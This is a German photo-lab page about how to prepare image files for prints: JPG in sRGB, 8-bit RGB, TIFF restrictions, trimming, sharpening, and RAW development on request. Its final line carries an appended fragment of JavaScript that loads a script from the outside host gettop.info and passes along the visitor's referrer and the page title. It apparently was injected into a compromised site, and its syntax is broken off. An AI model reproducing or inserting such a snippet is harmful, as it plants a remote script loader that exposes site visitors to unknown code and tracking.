Screenshot-Datei

Screenshot Bildmodus

Bitte senden Sie uns ausschließlich JPG-Dateien mit 8 (24) Bit Farbtiefe im RGB-Modus mit sRGB-Profil oder ganz ohne Profil. Wenn Sie z.B. Digitalkamera-Dateien mit AdobeRGB-Profil haben, dann ist die Umwandlung ins sRGB-Profil zwingend notwendig, da sonst die Bilder deutlich an Kontrast und Brillanz verlieren! (Hier finden Sie einen ausführlichen Artikel dazu.) SW-Bilder bitte auch im RGB-Modus und 8-Bit senden, möglichst ganz ohne Farbprofil.

Farbprofil

Natürlich gibt es auch ein Farbprofil speziell für unseren Fuji Laserbelichter und unser verwendetes Papier, Sie können es hier herunterladen.

Aus technischen Gründen werden die Fotos um ca. 1-3 mm beschnitten. Das zu beachten ist z.B. wichtig, wenn Sie die Bilder selber mit einem Rahmen oder mit Textunterschriften versehen wollen. Dieser Beschnitt erfolgt leider in allen auswählbaren Beschnitt-Varianten: überfüllen (klassisch), einpassen (digital) und 1zu1.

Bildgröße

Es hilft nicht, eine zu kleine Datei in einem Bildbearbeitungsprogramm einfach hochzurechnen, damit sie die Anforderung für ein größeres Bild erfüllt. Damit werden nur die vorhandenen Informationen vervielfältigt und das kann die Software unseres Belichters bedeutend besser. Wenn die Originaldatei zu klein ist für eine bestimmte Größe, müssen Qualitätseinbußen in Kauf genommen oder kleinere Formate gewählt werden.

Schärfen

Bitte seien Sie vorsichtig mit dem Nachschärfen der Bilder. Unscharfe Bilder werden dadurch nur leicht körnig und bei scharfen Aufnahmen genügt eine leichte Schärfung.

Farbverbindlichkeit

Grundsätzlich können wir für die Farbwiedergabe von bearbeiteten Bildern keine Farbverbindlichkeit garantieren, auch dann nicht, wenn Sie Ihren Monitor in irgendeiner Weise kalibriert haben. Dafür sind die Faktoren, die die Farbwiedergabe beeinflussen, zu vielfältig.
Um hier eine Lösung zu finden, empfiehlt sich ebenfalls eine telefonische Absprache für die Vorgehensweise. Beispielsweise können Sie uns einen Auftrag mit wenigen, für Sie repräsentativen Bildern schicken, die wir für Sie testweise ausbelichten.

Dateiformate

tiff-optionen

Tiff Optionen

Falls Sie uns ausnahmsweise TIFF-Dateien schicken wollen, dürfen diese Dateien keine:

  • offenen Ebenen enthalten
  • Alphakanäle (gespeicherte Auswahlen) enthalten
  • Pfade enthalten
  • LZW-Komprimierung beinhalten

Wenn Sie Ihre Bilder so bearbeitet haben oder den Originalfarbraum beibehalten wollen, dann erstellen Sie von Ihrer fertig bearbeiteten Datei am besten eine Kopie als JPG-Datei mit maximaler Qualität.

Wir belichten Fotos – wir drucken nicht

Bilder im CMYK-Farbmodus können wir nicht ohne Konvertierung belichten. Dasselbe gilt auch für reine Graustufenbilder, PDF-Dateien, PSD-Dateien, PPT-Dateien und noch Einige mehr. Sollten Sie uns solche (ungeeigneten) Dateiformate senden, müssen wir den erhöhten Aufwand mit den Preisen des Profiservice berechnen.

CameraRAW

Screenshot RAW Konverter

Grundsätzlich können wir auch RAW-Dateien für Sie entwickeln. Diese können aber nicht online bestellt werden. Die Abzüge werden immer mit den Preisen des Profiservice berechnet. Die Daten werden mit Adobe Camera Raw konvertiert. Wenn Sie also in diesem Konvertierungsprogramm Einstellungen vorgenommen haben, können diese übernommen werden. In jeden Fall ist hier eine vorherige telefonische Absprache dringend empfohlen.

Falls Sie noch Fragen haben oder gar nicht wissen, wovon hier eigentlich die Rede ist, dann rufen Sie uns einfach an, wir beraten Sie gern!} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;